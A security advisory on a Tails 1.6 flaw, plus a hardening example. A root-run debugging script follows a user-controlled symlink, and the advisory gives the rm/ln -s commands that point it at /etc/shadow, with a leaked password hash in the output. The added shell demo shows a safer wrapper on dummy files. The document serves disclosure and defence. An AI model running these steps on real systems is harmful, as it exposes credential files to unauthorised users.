Tails versions 1.6 and below suffer from an information leak vulnerability via a symlink attack.
Tails <= 1.6 tails-debugging-info information leak by cenobyte 2015
<vincitamorpatriae@gmail.com>
On Tails <= 1.6 it is possible to show the contents of /etc/shadow within the
context of the amnesia user when a password is set for that user.
The amnesia user can execute tails-debugging-info as root without a password
using sudo (/etc/sudoers.d/zzz_tails-debugging-info):
    amnesia ALL = NOPASSWD: /usr/local/sbin/tails-debugging-info ""
Note: Other commands executed as root using sudo which are not listed in the
sudoers files require a password.
There's a function in tails-debugging-info named debug_file() which serves as a
wrapper around cat:
    debug_file() {
        echo
        echo "===== content of $1 ====="
        cat "$1"
    }
debug_file() is called in tails-debugging-info with the following parameter:
    debug_file "/home/amnesia/.xsession-errors"
The .xsession-errors file is owned by the amnesia user and can be deleted and
replaced with a symlink to /etc/shadow:
    amnesia@amnesia:~$ rm ~/.xsession-errors
    amnesia@amnesia:~$ ln -s /etc/shadow ~/.xsession-errors
Running sudo tails-debugging-info now displays the password hash of the amnesia
user:
    amnesia@amnesia:~$ sudo tails-debugging-info 2>/dev/null | grep ^amnesia
    amnesia:$6$r0jt1v9E$UOrWbJ70qAH/sjaKfjmCMvkXZ19bqC2ieQ2UvYk0HKwVvgxuZFtyIwjoLfgHAwrZVM3a0NTEkcsQY1hn/Uq2S0:16710:0:99999:7:::
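
The symlink read described above, reproduced on constructed temporary files beside a hardened wrapper, as an added example that is not part of the advisory or of Tails' own code. debug_file_as, its owner argument and the demo helper are hypothetical names; the privilege drop assumes root can run sudo -u for the file's owner.

```shell
#!/bin/sh
# Added example; constructed paths and data, not code from Tails.

# The wrapper as quoted in the advisory: cat follows symlinks, so a root
# caller reads whatever the user-owned path points at.
debug_file() {
    echo
    echo "===== content of $1 ====="
    cat "$1"
}

# Hypothetical hardened variant: debug_file_as OWNER FILE
debug_file_as() {
    owner=$1
    file=$2
    echo
    echo "===== content of $file ====="
    # Refuse symlinks and non-regular files. On its own this check is racy
    # (the path can be swapped before cat opens it), so it is only a first
    # filter.
    if [ -L "$file" ] || [ ! -f "$file" ]; then
        echo "skipped: not a regular file"
        return 1
    fi
    if [ "$(id -u)" -eq 0 ] && [ "$owner" != root ]; then
        # Race-free part: open the file with the owner's privileges, so a
        # swapped-in link to a root-only file fails with "Permission denied".
        sudo -n -u "$owner" cat -- "$file"
    else
        cat -- "$file"
    fi
}

# Constructed demo: a temp dir stands in for /home/amnesia and a dummy file
# for /etc/shadow. Prints "<leaks from debug_file> <leaks from debug_file_as>".
demo() {
    dir=$(mktemp -d) || return 2
    printf 'constructed-secret\n' > "$dir/secret"
    ln -s "$dir/secret" "$dir/.xsession-errors"
    me=$(id -un 2>/dev/null || echo nobody)
    leaked=$(debug_file "$dir/.xsession-errors" | grep -c constructed-secret || true)
    blocked=$(debug_file_as "$me" "$dir/.xsession-errors" | grep -c constructed-secret || true)
    rm -rf "$dir"
    echo "$leaked $blocked"
}
```

Calling demo prints "1 0": the quoted wrapper discloses the linked file, the hardened one skips it.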